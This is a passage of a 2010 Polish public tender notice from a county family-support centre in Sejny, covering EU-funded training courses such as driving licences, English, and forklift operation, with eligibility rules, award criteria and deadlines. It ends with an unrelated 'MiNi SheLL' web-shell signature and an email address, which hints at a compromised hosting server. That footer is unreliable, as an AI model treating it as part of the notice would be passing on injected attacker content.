<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia /psychiatra, psycholog, lekarz medycyny pracy, doradca zawodowy, opiekun grupy, nauczyciel praktycznej nauki zawodu/ wraz z informacjami na temat posiadanych kwalifikacji, uprawnień i doświadczenia w zakresie objętym przedmiotem zamówienia oraz informacją o podstawie dysponowania tymi osobami - zgodnie z załącznikiem nr 3 do siwz.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Stopień zdawalności egzaminu  w części od 1 do 4 - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.st.sejny.wrotapodlasia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Sejnach 
16-500 Sejny ul. Piłsudskiego 34.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.06.2010 godzina 10:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Sejnach 
16-500 Sejny ul. Piłsudskiego 34.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Europejski Fundusz Społeczny w ramach PO KL priorytet VII Promocja integracji społecznej, Działania 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs Prawo jazdy kategorii  A.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 osoba, dodatkowo  2h zajęć praktycznych - 1 osobie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.34.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Stopień zdawalności egzaminu - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs Prawo jazdy kategorii B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 18 osób / Miejsce szkolenia teoretycznego Sejny.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.34.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Stopień zdawalności egzaminu - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 2a- Kurs Prawo jazdy kategorii B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 osoba / Miejsce szkolenia teoretycznego Ełk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.34.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. stopień zdawalności egzaminu - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 2b- Kurs Prawo jazdy kategorii B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 osoba / Miejsce szkolenia teoretycznego Białystok oraz dodatkowo 5h zajęć praktycznych dla 1 osoby i 2 h zajęć praktycznych kat. T  1 osobie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.34.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. stopień zdawalności egzaminu - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs Prawo jazdy kategorii C.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 5 osób.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.34.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. stopień zdawalności egzaminu - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Prawo jazdy kategorii C+E.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 osoba.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.34.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. stopień zdawalności egzaminu - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kurs język angielski angielskiego dla młodzieży.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin lekcyjnych:
- 51 h dla początkujących,
- 51 h dla średniozaawansowanych,
Liczba osób zgłoszonych do szkolenia - 9 osób.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kurs pt. Profesjonalny sprzedawca + kasy fiskalne..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) liczba godzin: 40 h dydaktycznych (1 godzina dydaktyczna= 45 min.)
b) liczba osób zgłoszonych do szkolenia - 5 osób.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Kurs pt. Kierowca wózków jezdniowych z wymianą butli gazowej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) liczba godzin: 44 h dydaktyczne
b) liczba osób zgłoszonych do szkolenia- 5 osób.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Kurs pt. Profesjonalna kosmetyczka..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) liczba godzin: 100
b) liczba osób zgłoszonych do szkolenia- 10 osoby.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Kurs pt. Tworzenie portali biznesowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) liczba godzin: minimum 60,  w tym 30 godzin pracy z trenerem i 30 godzin samodzielnej pracy monitorowanej.
b) liczba osób: 1.
c) sposób prowadzenia kursu: online - w formie wideokonferencji,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> szkolenie dla  osób zatrudnionych przy napełnianiu zbiorników pojazdów samochodowych zasilanych gazem skroplonym (LPG)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) liczba godzin: 20h 
b) liczba osób zgłoszonych do szkolenia- 1 osoba.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com